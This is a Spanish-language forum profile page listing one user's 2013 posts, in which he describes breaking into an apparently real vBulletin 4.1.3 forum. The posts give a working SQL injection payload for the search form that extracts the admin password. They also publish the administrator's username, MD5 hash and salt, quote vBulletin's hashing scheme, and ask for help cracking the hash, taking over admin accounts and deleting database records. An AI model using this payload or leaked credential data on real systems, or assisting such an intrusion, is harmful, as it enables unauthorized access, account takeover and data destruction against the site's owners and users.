Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - juansemaster

Páginas1

Nivel Web / Re: descifrar Hash vbulletin 4.1.3

10 Abril 2013, 00:01 AM

No hay suerte, te dejo la inyeccion SQL para ver si se puede hacer algo mas con ella.

Código (sql) [Seleccionar]



&searchfromtype=vBForum:SocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user 

where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 

union select 2 union select 3)a group by x limit 1) -- /*);

Eso se agrega en el formulario de busqueda.

Estaria bueno enviar una orden para borrar cierto registro tipo:

Código (sql) [Seleccionar]

mysql_query(delete from user where userid=408);

Probe sin resultados.

Nivel Web / Re: descifrar Hash vbulletin 4.1.3

3 Abril 2013, 00:51 AM

estoy atascado

Probe con la cookie con un complemento de firefox para modificarlas pero aparentemente vbulletin crea otro dato en md5 para las cookies asi que es imposble.

Probe con muchos diccionarios sin exito en la pc tambien mediante php

sin resultados, el script funciona con la salt hice la prueba con mi propia cuenta y funciono pero por ahora no logro crackear la de los administradores.

La salt tiene que contener 30 caracteres el problema con < hay que cambiarla por el signo menor.

<= <

donde puedo conseguir diccionarios interesantes si estan relacionados con el futbol mejor.

Nivel Web / Re: descifrar Hash vbulletin 4.1.3

29 Marzo 2013, 07:17 AM

logre obtener el salt del administrador ahora tengo mas datos

Admin id1
hash: e53a3baca64869cb558bc6f6f5fab4f5
salt: aY-t'2c;`<s?GYYqsDnUP=(AQ(mH'8

voy a intentar crackearlo

Nivel Web / Re: descifrar Hash vbulletin 4.1.3

29 Marzo 2013, 07:11 AM

Código (php) [Seleccionar]


function fetch_user_salt($length = 30)
{
	$salt = '';
	for ($i = 0; $i < $length; $i++)
	{
		$salt .= chr(vbrand(33, 126));
	}
	return $salt;
}

parece que el salt se obtiene al azar y es pasado a ascii

Nivel Web / Re: descifrar Hash vbulletin 4.1.3

29 Marzo 2013, 06:39 AM

encontre esto en el archivo passwordcheck.php

WHERE password = MD5(CONCAT(MD5(username),salt))

el valor salt tiene el siguiente formato

n]t!Cir&n<z0FC7FDdPNMK@h6[hwqy

nose en que esta cifrado

Nivel Web / Re: descifrar Hash vbulletin 4.1.3

28 Marzo 2013, 23:21 PM

Como se obtiene el salt con que datos?

Nivel Web / descifrar Hash vbulletin 4.1.3

28 Marzo 2013, 18:27 PM

Accedi a los hashes de un foro en vbulletin mediante una inyección en php

paso los hash

Usuario:hash:ide

cai_baguette:e53a3baca64869cb558bc6f6f5fab4f5:1

El problema que tengo ahora es no puedo descifrar los hash presumiblemente en MD5.

Tambien intente en modficar cookies de acceso sin resultados positivos.

El desafio es encontrar una forma de descifrar los hash o utilizar estos para acceder a las cuentas de los administradores.

Saludos
Juansemaster

Páginas1

Test Foro de elhacker.net SMF 2.1